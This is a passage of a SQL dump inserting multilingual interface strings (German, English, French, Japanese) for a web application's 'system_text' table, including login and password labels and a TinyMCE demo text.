'deDE', 'Admin Rechte', 0, 2, '2015-04-16 16:50:40', '2015-04-16 15:43:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_admin_rights', 'enUS', '

Admin Rights

', 0, 2, '2015-04-16 17:55:53', '2015-04-16 17:55:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_admin_rights', 'frFR', 'Droits du administrateur', 3, 3, '2015-04-20 16:44:03', '2015-04-20 16:44:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_admin_rights', 'jaJA', '管理者権限', 0, 2, '2015-04-17 20:32:33', '2015-04-17 20:32:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_all', 'deDE', 'Alle', 2, 2, '2015-04-20 01:45:03', '2015-04-20 01:45:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_all', 'enUS', 'All', 2, 2, '2015-04-18 13:57:18', '2015-04-18 13:57:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_all', 'frFR', 'Tous', 3, 3, '2015-04-20 16:31:55', '2015-04-20 16:31:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_analytics', 'deDE', 'Statistik', 0, 0, '2015-04-16 14:13:25', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_analytics', 'enUS', 'Analytics', 2, 2, '2015-04-17 19:20:19', '2015-04-17 19:20:19'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_analytics', 'frFR', 'Statistique', 3, 3, '2015-04-20 14:20:35', '2015-04-20 14:20:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_analytics', 'jaJA', '統計', 0, 0, '2015-04-16 14:32:45', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_assign', 'deDE', 'Mach ich', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_assign', 'enUS', 'I Do it', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_back', 'deDE', 'Zurück', 2, 2, '2015-04-20 01:44:24', '2015-04-20 01:44:24'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_back', 'enUS', 'Back', 2, 2, '2015-04-18 13:34:53', '2015-04-18 13:34:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_back', 'frFR', 'Retour', 3, 3, '2015-04-20 16:34:28', '2015-04-20 16:34:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_cancel', 'deDE', 'Abbrechen', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_cancel', 'enUS', 'Cancel', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_cancel', 'frFR', 'Annuler', 3, 3, '2015-04-18 04:46:32', '2015-04-18 04:46:32'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_cancel', 'jaJA', 'キャンシル', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_change', 'deDE', 'Ändern', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_change', 'enUS', 'Change', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close', 'deDE', 'Schließen', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close', 'enUS', 'Close', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close', 'frFR', 'Fermer', 3, 3, '2015-04-18 04:47:27', '2015-04-18 04:47:27'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close', 'jaJA', '閉める', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close_all', 'deDE', 'Alle schließen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_close_all', 'enUS', 'Close all', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_deassign', 'deDE', 'Mach ich nicht', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_deassign', 'enUS', 'I don\'t Do that', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_delete', 'deDE', 'Löschen', 2, 2, '2015-04-20 01:45:45', '2015-04-20 01:45:45'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_delete', 'enUS', 'Delete', 2, 2, '2015-04-18 13:35:31', '2015-04-18 13:35:31'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_delete', 'frFR', 'Effacer', 3, 3, '2015-04-20 16:30:09', '2015-04-20 16:30:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_edit', 'deDE', 'Ändern', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_edit', 'enUS', 'Edit', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email', 'deDE', 'E-Mail', 0, 2, '2015-04-17 20:30:52', '2015-04-17 20:30:52'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email', 'enUS', 'EMail', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email', 'frFR', 'éMail', 3, 3, '2015-04-20 14:21:33', '2015-04-20 14:21:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email', 'jaJA', 'メール', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email_wrong', 'deDE', 'Invalid EMail!', 0, 2, '2015-04-18 13:15:58', '2015-04-18 13:15:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email_wrong', 'enUS', 'Invalid EMail!', 0, 0, '2015-04-18 13:15:58', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_email_wrong', 'frFR', 'Adresse courriel non valide!', 3, 3, '2015-04-20 16:23:48', '2015-04-20 16:23:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_error', 'deDE', 'Fehler', 2, 2, '2015-04-20 01:45:35', '2015-04-20 01:45:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_error', 'enUS', 'Error', 2, 2, '2015-04-18 13:56:13', '2015-04-18 13:56:13'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_error', 'frFR', 'Erreur', 3, 3, '2015-04-20 16:30:41', '2015-04-20 16:30:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_example', 'deDE', '

TinyMCE LogoWelcome to the TinyMCE editor demo!

Feel free to try out the different features that are provided, please note that the MoxieManager specific functionality is part of our commercial offering. The demo is to show the integration.

Got questions or need help?

If you have questions or need help, feel free to visit our community forum! We also offer Enterprise support solutions. Also do not miss out on the documentation, its a great resource wiki for understanding how TinyMCE works and integrates.

Found a bug?

If you think you have found a bug, you can use the Bug Tracker to report bugs to the developers.

And here is a simple table for you to play with.

ProductCostReally?
TinyMCEFreeYES!
PluploadFreeYES!

Enjoy our software and create great content!

Oh, and by the way, don\'t forget to check out our other product called Plupload, your ultimate upload solution with HTML5 upload support!

', 0, 2, '2015-04-18 13:31:15', '2015-04-18 13:31:15'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_example', 'enUS', '

TinyMCE LogoWelcome to the TinyMCE editor demo!

\n

Feel free to try out the different features that are provided, please note that the MoxieManager specific functionality is part of our commercial offering. The demo is to show the integration.

\n

Got questions or need help?

\n

If you have questions or need help, feel free to visit our community forum! We also offer Enterprise support solutions. Also do not miss out on the documentation, its a great resource wiki for understanding how TinyMCE works and integrates.

\n

Found a bug?

\n

If you think you have found a bug, you can use the Bug Tracker to report bugs to the developers.

\n

And here is a simple table for you to play with.

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ProductCostReally?
TinyMCEFreeYES!
PluploadFreeYES!
\n

Enjoy our software and create great content!

\n

Oh, and by the way, don\'t forget to check out our other product called Plupload, your ultimate upload solution with HTML5 upload support!

', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_free', 'deDE', 'Frei', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_free', 'enUS', 'Free', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_generated', 'deDE', 'Generiert', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_generated', 'enUS', 'Generated', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_git', 'deDE', 'Git', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_git', 'enUS', 'Git', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_ips', 'deDE', 'IPs', 1, 1, '2015-04-16 23:22:09', '2015-04-16 16:47:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_ips', 'enUS', 'IPs', 2, 1, '2015-04-16 23:22:09', '2015-04-16 23:22:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_join_date', 'deDE', 'Beitrittsdatum', 0, 2, '2015-04-17 20:32:44', '2015-04-17 20:32:44'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_join_date', 'enUS', 'Joindate', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_join_date', 'frFR', 'Date de l\'affiliation
', 3, 3, '2015-04-20 14:31:49', '2015-04-20 14:31:49'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_join_date', 'jaJA', 'メンバになりましたの日', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_last_active', 'deDE', 'Zuletzt aktiv', 0, 2, '2015-04-17 20:31:03', '2015-04-17 20:31:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_last_active', 'enUS', 'Last active', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_last_active', 'frFR', 'en dernier actif', 3, 3, '2015-04-20 14:26:17', '2015-04-20 14:26:17'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_last_active', 'jaJA', '前のログイン', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_locale', 'deDE', 'Sprache', 0, 2, '2015-04-17 20:31:27', '2015-04-17 20:31:27'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_locale', 'enUS', 'Locale', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_locale', 'frFR', 'Langue', 3, 3, '2015-04-20 16:35:18', '2015-04-20 16:35:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_locale', 'jaJA', '言葉', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_log', 'deDE', 'Log', 0, 0, '2015-04-16 14:27:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_log', 'enUS', 'Log', 2, 2, '2015-04-17 19:20:04', '2015-04-17 19:20:04'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_log', 'frFR', 'Log', 3, 3, '2015-04-20 14:19:53', '2015-04-20 14:19:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_log', 'jaJA', '報告', 2, 2, '2015-04-23 01:44:00', '2015-04-23 01:44:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_login', 'deDE', 'Einloggen', 0, 2, '2015-04-21 03:38:29', '2015-04-21 03:38:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_login', 'enUS', 'Login', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_login', 'frFR', 'Connecter', 1, 1, '2015-04-19 20:57:06', '2015-04-19 20:57:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_login', 'jaJA', 'ログイン', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_logout', 'deDE', 'Ausloggen', 0, 2, '2015-04-17 20:30:25', '2015-04-17 20:30:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_logout', 'enUS', 'Logout', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_logout', 'frFR', 'Déconnecter', 3, 3, '2015-04-20 14:20:59', '2015-04-20 14:20:59'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_logout', 'jaJA', 'ログアウト', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_mine', 'deDE', 'Meine', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_mine', 'enUS', 'Mine', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_month', 'deDE', 'Monat', 1, 1, '2015-04-16 23:12:34', '2015-04-16 16:48:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_month', 'enUS', 'Month', 2, 1, '2015-04-16 23:12:34', '2015-04-16 23:12:34'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_month', 'frFR', 'Mois', 3, 3, '2015-04-18 04:53:43', '2015-04-18 04:53:43'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_month', 'jaJA', '月', 1, 1, '2015-04-16 23:12:34', '2015-04-16 16:54:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_name', 'deDE', 'Name', 0, 0, '2015-04-16 23:15:33', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_name', 'enUS', 'Name', 2, 1, '2015-04-16 23:15:33', '2015-04-16 23:15:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_name', 'frFR', 'Nom', 3, 3, '2015-04-18 04:54:38', '2015-04-18 04:54:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_name', 'jaJA', '計画名前', 0, 0, '2015-04-16 23:15:33', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_new_right', 'deDE', 'Neues Recht', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_new_right', 'enUS', 'New Right', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_no_tag', 'deDE', 'Kein Tag', 2, 2, '2015-04-20 01:46:19', '2015-04-20 01:46:19'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_no_tag', 'enUS', 'No Tag', 2, 2, '2015-04-18 13:25:47', '2015-04-18 13:25:47'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_no_tag', 'frFR', 'Pas des Tags', 3, 3, '2015-04-20 18:56:53', '2015-04-20 18:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_open', 'deDE', 'Öffnen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_open', 'enUS', 'Open', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_others', 'deDE', 'Andere', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_others', 'enUS', 'Others', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_page', 'deDE', 'Seite', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_page', 'enUS', 'Page', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password', 'deDE', 'Passwort', 0, 2, '2015-04-17 20:31:17', '2015-04-17 20:31:17'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password', 'enUS', 'Password', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password', 'frFR', 'Mot de passe', 3, 3, '2015-04-20 16:34:46', '2015-04-20 16:34:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password', 'jaJA', 'パスワード', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_long', 'deDE', 'Passwort zu lang', 0, 2, '2015-04-18 13:16:18', '2015-04-18 13:16:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_long', 'enUS', 'Password too long', 0, 0, '2015-04-18 13:16:18', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_long', 'frFR', 'Mot de passe trop long!', 3, 3, '2015-04-20 16:28:21', '2015-04-20 16:28:21'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_match', 'deDE', 'Passwords do not match!', 0, 2, '2015-04-18 13:16:33', '2015-04-18 13:16:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_match', 'enUS', 'Passwords do not match!', 0, 0, '2015-04-18 13:16:33', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_match', 'frFR', 'Les mots de passe ne lui correspondent pas!', 3, 3, '2015-04-20 16:20:57', '2015-04-20 16:20:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_miss', 'deDE', 'Passwort erforderlich', 0, 2, '2015-04-18 13:16:46', '2015-04-18 13:16:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_miss', 'enUS', 'Password required', 0, 0, '2015-04-18 13:16:46', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_miss', 'frFR', 'Mot de passe demandé!', 3, 3, '2015-04-20 16:18:30', '2015-04-20 16:18:30'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_short', 'deDE', 'Passwort zu kurz', 0, 2, '2015-04-18 13:16:58', '2015-04-18 13:16:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_short', 'enUS', 'Password too short', 0, 0, '2015-04-18 13:16:58', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_password_short', 'frFR', 'Mot de passe est trop court!', 3, 3, '2015-04-20 16:24:50', '2015-04-20 16:24:50'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'deDE', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'enUS', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'esES', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'frFR', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'jaJA', 'peter@world.org', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_email', 'trTR', 'peter@world.org', 0, 0, '2015-04-15 18:29:17', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_password', 'deDE', 'geheim23', 0, 2, '2015-04-21 03:39:39', '2015-04-21 03:39:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_password', 'enUS', 'secret123', 0, 2, '2015-04-20 01:42:30', '2015-04-20 01:42:30'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_password', 'jaJA', '丸秘のパスワード', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_search', 'deDE', 'Ich suche nach...', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_search', 'enUS', 'I\'m searching for...', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'deDE', 'peter / peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'enUS', 'peter / peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, 